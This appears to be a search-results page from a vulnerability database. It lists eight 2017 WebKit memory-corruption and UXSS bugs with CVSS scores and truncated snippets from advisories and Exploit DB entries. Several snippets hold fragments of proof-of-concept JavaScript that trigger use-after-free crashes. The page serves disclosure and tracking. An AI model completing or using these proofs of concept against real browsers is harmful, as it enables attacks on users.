8 matches found

seebug.org
added 2017/11/23 12:00 a.m. | 56 views

WebKit: out-of-bounds read in WebCore::SimpleLineLayout::RunResolver::runForPoint (CVE-2017-13784)

There is an out-of-bounds read security vulnerability in WebKit. The vulnerability was confirmed on ASan build of WebKit nightly. ASan log: ================================================================= ==30436==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x606000560c48 at pc...

CVSS: 6.8 | AI score: 7 | EPSS: 0.21364
Exploits: 4
seebug.org
added 2017/11/23 12:00 a.m. | 36 views

WebKit: use-after-free in WebCore::FormSubmission::create (CVE-2017-13791)

There is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on ASan build of WebKit nightly. ASan log: ================================================================= ==934==ERROR: AddressSanitizer: heap-use-after-free on address 0x60c0000b9810 at pc 0x000114b6f4...

CVSS: 6.8 | AI score: 0.3 | EPSS: 0.19925
Exploits: 4
0day.today
added 2017/11/22 12:00 a.m. | 52 views

WebKit - WebCore::InputType::element Use-After-Free Exploit

Exploit for multiple platform in category dos / poc / Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1345 There is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on ASan build of WebKit nightly. PoC:...

CVSS: 6.8 | AI score: 7.1 | EPSS: 0.21364
Exploits: 4
seebug.org
added 2017/04/19 12:00 a.m. | 12 views

Apple WebKit: UXSS via PrototypeMap::createEmptyStructure

When creating an object in Javascript, its |Structure| is created with the constructor's prototype's |VM|. Here's some snippets of that routine. Structure InternalFunction::createSubclassStructureExecState exec, JSValue newTarget, Structure baseClass ... if newTarget && newTarget != exec-jsCallee...

AI score: 6.9
Exploits: 0
0day.today
added 2017/04/05 12:00 a.m. | 32 views

Apple WebKit 10.0.2(12602.3.12.0.1, r210800) - constructJSReadableStreamDefaultReader Type Confusion

Exploit for multiple platform in category web applications exec.argument0; if !stream return throwArgumentTypeErrorexec, scope, 0, "stream", "ReadableStreamReader", nullptr, "ReadableStream"; JSValue jsFunction = stream-get&exec, Identifier::fromString&exec, "getReader"; let rs = new...

CVSS: 6.8 | AI score: 8.7 | EPSS: 0.02526
Exploits: 3
Exploit DB
added 2017/04/04 12:00 a.m. | 28 views

Apple WebKit - 'ComposedTreeIterator::traverseNextInShadowTree' Use-After-Free

function go d.open = false; d.innerHTML = "foo"; d.open = true; foo !-- ================================================================= ASan log: ================================================================= ==570==ERROR: AddressSanitizer: heap-use-after-free on address 0x607000065058 at pc...

AI score: 7.4
Exploits: 0
Exploit DB
added 2017/04/04 12:00 a.m. | 54 views

Apple WebKit 10.0.2 - HTMLInputElement Use-After-Free

function eventhandler1 input.type = "foo"; function eventhandler2 input.selectionStart = 25; !-- ================================================================= ASAN log from WebKit nightly on Mac: ================================================================= ==26782==ERROR: AddressSanitize...

AI score: 7.4
Exploits: 0
Exploit DB
added 2017/04/04 12:00 a.m. | 43 views

Apple WebKit - 'FormSubmission::create' Use-After-Free

function go object.name = "foo"; input.autofocus = true; output.appendChildinput; form.submit; function eventhandler forvar i=0;i a !-- ================================================================= Preliminary analysis: The bug is in FormSubmission::create. This function traverses the vector ...

AI score: 7
Exploits: 0